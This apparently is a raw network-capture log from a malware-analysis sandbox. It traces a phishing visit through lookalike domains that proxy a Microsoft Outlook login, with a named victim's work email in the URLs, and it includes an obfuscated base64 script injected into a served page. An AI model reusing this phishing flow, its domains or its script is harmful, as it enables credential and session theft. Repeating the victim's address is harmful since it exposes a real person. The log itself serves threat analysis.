2024-06-21 15:59:26 UTC	1369	IN	Data Raw: 32 39 65 57 32 64 2b 67 34 64 4b 35 31 64 44 6e 35 2b 65 2b 37 74 6e 58 37 64 33 46 34 64 7a 79 39 73 76 34 71 2f 72 6a 2b 66 6a 52 37 66 53 34 41 39 58 42 76 51 62 61 78 51 50 49 31 63 66 61 43 75 4c 4e 44 78 54 53 44 75 4d 55 45 67 6b 57 46 4e 49 56 38 64 33 7a 31 2f 63 50 48 76 76 78 38 67 6b 53 42 76 34 58 41 51 30 66 4b 69 58 38 4b 79 6f 32 4e 44 67 6b 44 41 67 55 4d 6a 45 6d 4e 66 77 59 4c 42 41 52 47 69 45 45 42 45 63 6b 4a 68 38 56 49 77 35 4d 4b 43 39 55 45 46 59 31 46 41 70 49 52 78 6b 79 55 7a 5a 57 4b 46 42 51 5a 46 56 57 56 45 49 69 4f 6a 68 6c 4e 43 52 65 63 44 78 78 52 6b 73 78 61 6e 4a 51 62 55 4e 77 63 48 4a 6c 4e 6b 31 34 55 31 39 33 62 34 52 32 68 6e 6c 54 58 34 47 47 6a 47 4b 41 58 47 65 4a 55 59 61 4a 67 34 78 35 64 33 47 53 57 6e 6d Data Ascii: 29eW2d+g4dK51dDn5+e+7tnX7d3F4dzy9sv4q/rj+fjR7fS4A9XBvQbaxQPI1cfaCuLNDxTSDuMUEgkWFNIV8d3z1/cPHvvx8gkSBv4XAQ0fKiX8Kyo2NDgkDAgUMjEmNfwYLBARGiEEBEckJh8VIw5MKC9UEFY1FApIRxkyUzZWKFBQZFVWVEIiOjhlNCRecDxxRksxanJQbUNwcHJlNk14U193b4R2hnlTX4GGjGKAXGeJUYaJg4x5d3GSWnm
2024-06-21 15:59:26 UTC	1369	IN	Data Raw: 71 32 64 34 37 66 55 35 4d 71 37 34 36 6e 45 37 4c 48 72 37 61 37 75 39 62 48 31 38 2b 62 33 74 62 58 33 39 66 58 53 75 39 62 38 76 63 44 7a 30 39 63 46 42 38 59 4a 2b 41 7a 62 41 4d 37 6e 33 77 34 59 41 75 72 52 31 68 67 53 44 67 38 4b 2b 52 34 4d 47 4f 41 69 45 66 72 61 33 78 54 6c 43 69 34 75 47 67 4c 6f 48 68 4d 4b 38 6a 59 68 2b 50 59 6d 43 77 34 2b 4b 52 50 2b 44 6b 49 54 4a 41 39 47 46 79 4a 4a 4e 55 45 61 53 30 34 75 45 51 6f 2f 53 54 49 4e 51 78 63 6e 45 45 55 62 4c 6c 78 64 57 52 4d 55 59 56 6c 65 4d 6d 56 64 4e 44 5a 57 56 6b 77 33 57 53 70 47 63 31 31 70 55 69 78 52 51 47 68 44 4d 55 74 52 57 48 6d 41 64 48 36 44 64 6a 35 75 65 6e 35 47 61 55 52 39 56 59 35 76 69 6e 75 51 68 48 42 52 56 4a 56 58 62 56 4f 4b 6c 33 57 66 56 70 31 31 6d 5a 78 75 Data Ascii: q2d47fU5Mq746nE7LHr7a7u9bH18+b3tbX39fXSu9b8vcDz09cFB8YJ+AzbAM7n3w4YAurR1hgSDg8K+R4MGOAiEfra3xTlCi4uGgLoHhMK8jYh+PYmCw4+KRP+DkITJA9GFyJJNUEaS04uEQo/STINQxcnEEUbLlxdWRMUYVleMmVdNDZWVkw3WSpGc11pUixRQGhDMUtRWHmAdH6Ddj5uen5GaUR9VY5vinuQhHBRVJVXbVOKl3WfVp11mZxu
2024-06-21 15:59:26 UTC	590	IN	Data Raw: 72 44 74 2b 69 74 79 65 37 7a 73 75 43 7a 73 63 72 52 2b 76 58 52 36 64 48 39 36 4c 62 55 76 66 7a 42 42 73 41 43 2f 64 6f 49 79 51 59 44 2b 73 33 6e 33 76 7a 70 41 68 45 42 41 39 62 77 30 66 48 6e 42 74 73 61 33 43 49 66 34 77 50 7a 45 4f 59 71 46 2b 50 64 43 41 66 73 47 6a 48 6f 36 79 37 75 49 7a 6a 33 4b 68 72 32 45 52 41 32 50 78 55 63 46 44 38 2b 51 45 64 41 41 69 52 43 53 45 51 4c 4f 6a 6b 51 4c 43 59 4e 46 43 4a 53 56 53 30 73 53 52 56 46 4b 6c 30 63 4e 69 78 4c 59 45 77 6a 4f 79 51 6e 56 43 67 70 4f 32 5a 70 61 6c 67 75 51 33 4e 66 5a 54 4e 79 59 7a 4e 6f 65 6e 56 51 61 54 31 66 56 48 41 2b 57 6d 42 4f 52 49 4a 44 56 49 5a 34 64 6f 56 4b 68 6f 5a 65 66 49 68 52 6b 6f 43 4e 59 31 43 59 56 56 31 57 69 5a 71 41 62 49 35 7a 67 71 65 54 6f 6f 64 67 6c Data Ascii: rDt+itye7zsuCzscrR+vXR6dH96LbUvfzBBsAC/doIyQYD+s3n3vzpAhEBA9bw0fHnBtsa3CIf4wPzEOYqF+PdCAfsGjHo6y7uIzj3Khr2ERA2PxUcFD8+QEdAAiRCSEQLOjkQLCYNFCJSVS0sSRVFKl0cNixLYEwjOyQnVCgpO2ZpalguQ3NfZTNyYzNoenVQaT1fVHA+WmBORIJDVIZ4doVKhoZefIhRkoCNY1CYVV1WiZqAbI5zgqeToodgl

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:26 UTC	1286	OUT	POST /?lbkwmykb=446d7ae8e2b0026c09e952c1046f26eb20f17c5c86fdb89bf6a6962aa75a09f904517ec41333b61ba7f0802aa8928dcdb1650ecd8ee69f3c108083478cb5684c&qrc=lawrence.france%40cabinetworksgroup.com HTTP/1.1 Host: venicuttnortheastusa.com Connection: keep-alive Content-Length: 560 Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://venicuttnortheastusa.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://venicuttnortheastusa.com/?lbkwmykb=446d7ae8e2b0026c09e952c1046f26eb20f17c5c86fdb89bf6a6962aa75a09f904517ec41333b61ba7f0802aa8928dcdb1650ecd8ee69f3c108083478cb5684c&qrc=lawrence.france%40cabinetworksgroup.com Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8
2024-06-21 15:59:26 UTC	560	OUT	Data Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 30 70 47 33 70 47 79 46 58 67 6c 48 6e 61 76 69 70 71 54 6a 39 4c 37 2d 76 51 4b 5f 57 34 6d 30 4c 77 67 39 6b 5f 45 74 49 50 31 4c 51 59 66 69 54 36 73 48 44 75 61 47 45 72 36 65 6c 4b 77 48 74 35 67 6f 67 78 34 41 77 4b 39 75 4b 61 50 45 49 63 55 6d 63 47 66 63 78 43 67 6a 75 6f 6d 6d 66 5a 61 65 34 42 38 66 75 6c 31 30 30 56 66 52 77 69 78 79 68 30 6a 55 71 72 58 72 2d 33 59 57 6a 73 65 35 50 65 6f 2d 2d 78 5a 41 55 32 41 58 6f 47 7a 50 43 4b 32 43 6a 53 47 75 44 45 5a 5f 49 67 42 78 35 6c 79 76 74 36 73 65 6a 2d 35 6e 62 6b 62 79 41 33 66 30 73 72 51 5f 45 41 65 6c 47 58 64 6f 6a 39 7a 63 77 58 57 62 66 6d 6e 34 4c 72 68 32 77 42 59 4f 4a 6b 53 39 74 52 58 57 4d 41 62 4a 5a 61 50 Data Ascii: cf-turnstile-response=0.0pG3pGyFXglHnavipqTj9L7-vQK_W4m0Lwg9k_EtIP1LQYfiT6sHDuaGEr6elKwHt5gogx4AwK9uKaPEIcUmcGfcxCgjuommfZae4B8ful100VfRwixyh0jUqrXr-3YWjse5Peo--xZAU2AXoGzPCK2CjSGuDEZ_IgBx5lyvt6sej-5nbkbyA3f0srQ_EAelGXdoj9zcwXWbfmn4Lrh2wBYOJkS9tRXWMAbJZaP
2024-06-21 15:59:27 UTC	489	IN	HTTP/1.1 302 Found location: https://webnnicuttnortheastusa.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3dlYm5uaWN1dHRub3J0aGVhc3R1c2EuY29tLyIsImRvbWFpbiI6IndlYm5uaWN1dHRub3J0aGVhc3R1c2EuY29tIiwia2V5IjoiTm1YcDJ4Tm9uY3JBIiwicXJjIjoibGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbSIsImlhdCI6MTcxODk4NTU3NywiZXhwIjoxNzE4OTg1Njk3fQ.HykXssHfF_M4UV6XA1brZjWnq3CfmkAs4Wo7LDtvRyM Date: Fri, 21 Jun 2024 15:59:37 GMT Connection: close Transfer-Encoding: chunked
2024-06-21 15:59:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:28 UTC	1081	OUT	GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3dlYm5uaWN1dHRub3J0aGVhc3R1c2EuY29tLyIsImRvbWFpbiI6IndlYm5uaWN1dHRub3J0aGVhc3R1c2EuY29tIiwia2V5IjoiTm1YcDJ4Tm9uY3JBIiwicXJjIjoibGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbSIsImlhdCI6MTcxODk4NTU3NywiZXhwIjoxNzE4OTg1Njk3fQ.HykXssHfF_M4UV6XA1brZjWnq3CfmkAs4Wo7LDtvRyM HTTP/1.1 Host: webnnicuttnortheastusa.com Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://venicuttnortheastusa.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-21 15:59:28 UTC	326	IN	HTTP/1.1 302 Found Set-Cookie: qPdM=NmXp2xNoncrA; path=/; samesite=none; secure; httponly Set-Cookie: qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; path=/; samesite=none; secure; httponly location: /?qrc=lawrence.france%40cabinetworksgroup.com Date: Fri, 21 Jun 2024 15:59:38 GMT Connection: close Transfer-Encoding: chunked
2024-06-21 15:59:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:29 UTC	854	OUT	GET /?qrc=lawrence.france%40cabinetworksgroup.com HTTP/1.1 Host: webnnicuttnortheastusa.com Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://venicuttnortheastusa.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8
2024-06-21 15:59:29 UTC	1220	IN	HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache Pragma: no-cache Location: https://webnnicuttnortheastusa.com/owa/?login_hint=lawrence.france%40cabinetworksgroup.com Server: Microsoft-IIS/10.0 request-id: 315cda69-ab28-848e-1832-e8e2b5d8bc59 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-FEServer: FR3P281CA0116, FR3P281CA0116 X-RequestId: 5802f5c5-8353-46e4-8284-d9cc37cee8ba X-FEProxyInfo: FR3P281CA0116.DEUP281.PROD.OUTLOOK.COM X-FEEFZInfo: HHN MS-CV: adpcMSirjoQYMujitdi8WQ.0 X-Powered-By: ASP.NET Date: Fri, 21 Jun 2024 15:59:28 GMT Connection: close Content-Length: 0 Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:30 UTC	865	OUT	GET /owa/?login_hint=lawrence.france%40cabinetworksgroup.com HTTP/1.1 Host: webnnicuttnortheastusa.com Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://venicuttnortheastusa.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8
2024-06-21 15:59:30 UTC	7384	IN	HTTP/1.1 302 Found content-length: 1416 Content-Type: text/html; charset=utf-8 Location: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVf [TRUNCATED] Server: Microsoft-IIS/10.0 request-id: d9a3f2e3-2164-d85d-3b2e-287dc34359ee Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000 X-CalculatedFETarget: FR4P281CU026.internal.outlook.com X-BackEndHttpStatus: 302, 302 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ClientId=DC6EE31578E74AAEA2886B6234ACAA88; expires=Sat, 21-Jun-2025 15:59:30 GMT; path=/;SameSite=None; secure Set-Cookie: ClientId=DC6EE31578E74AAEA2886B6234ACAA88; expires=Sat, 21-Jun-2025 15:59:30 GMT; path=/;SameSite=None; secure Set-Cookie: OIDC=1; expires=Sat, 21-Dec-2024 15:59:30 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: RoutingKeyCookie=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.token.v1=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.token.v1=; domain=webnnicuttnortheastusa.com; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.id_token.v1=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.code.v1=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.id_token.v1=; domain=webnnicuttnortheastusa.com; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.code.v1=; domain=webnnicuttnortheastusa.com; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=webnnicuttnortheastusa.com; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=webnnicuttnortheastusa.com; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.tokenPostPath=; domain=webnnicuttnortheastusa.com; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; expires=Fri, 21-Jun-2024 16:59:30 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: HostSwitchPrg=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OptInPrg=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: SuiteServiceProxyKey=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: ClientId=DC6EE31578E74AAEA2886B6234ACAA88; expires=Sat, 21-Jun-2025 15:59:30 GMT; path=/;SameSite=None; secure Set-Cookie: OIDC=1; expires=Sat, 21-Dec-2024 15:59:30 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: RoutingKeyCookie=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.token.v1=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.token.v1=; domain=webnnicuttnortheastusa.com; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.id_token.v1=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.code.v1=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.id_token.v1=; domain=webnnicuttnortheastusa.com; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.code.v1=; domain=webnnicuttnortheastusa.com; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=webnnicuttnortheastusa.com; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=webnnicuttnortheastusa.com; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.tokenPostPath=; domain=webnnicuttnortheastusa.com; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; expires=Fri, 21-Jun-2024 16:59:30 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: HostSwitchPrg=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: OptInPrg=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: SuiteServiceProxyKey=; expires=Tue, 21-Jun-1994 15:59:30 GMT; path=/; secure Set-Cookie: X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; expires=Fri, 21-Jun-2024 22:01:30 GMT; path=/;SameSite=None; secure; HttpOnly X-CalculatedBETarget: FRYP281MB0159.DEUP281.PROD.OUTLOOK.COM X-RUM-Validated: 1 X-RUM-NotUpdateQueriedPath: 1 X-RUM-NotUpdateQueriedDbCopy: 1 X-BeSku: WCS6 X-OWA-DiagnosticsInfo: 1;0;0 X-BackEnd-Begin: 2024-06-21T15:59:30.405 X-BackEnd-End: 2024-06-21T15:59:30.405 X-DiagInfo: FRYP281MB0159 X-BEServer: FRYP281MB0159 X-UA-Compatible: IE=EmulateIE7 X-Proxy-RoutingCorrectness: 1 X-Proxy-BackendServerStatus: 302 X-FEProxyInfo: FR3P281CA0112.DEUP281.PROD.OUTLOOK.COM X-FEEFZInfo: HHN X-FEServer: FR4P281CA0381, FR3P281CA0112 NEL: {"report_to":"NelOfficeUpload1","max_age":7200,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01} X-FirstHopCafeEFZ: HHN Date: Fri, 21 Jun 2024 15:59:30 GMT Connection: close Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2024-06-21 15:59:30 UTC	1416	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32 4e 31 62 57 56 75 64 43 35 6f 5a 57 46 6b 4c 6d 46 77 63 47 56 75 5a 45 4e 6f 61 57 78 6b 4b 45 39 69 61 6d 56 6a 64 43 35 68 63 33 4e 70 5a 32 34 6f 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 33 4a 6c 59 58 52 6c 52 57 78 6c 62 57 56 75 64 43 67 69 5a 47 6c 32 49 69 6b 73 65 Data Ascii: <html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:31 UTC	2011	OUT	GET /?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg= HTTP/1.1 Host: webnnicuttnortheastusa.com Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://venicuttnortheastusa.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag
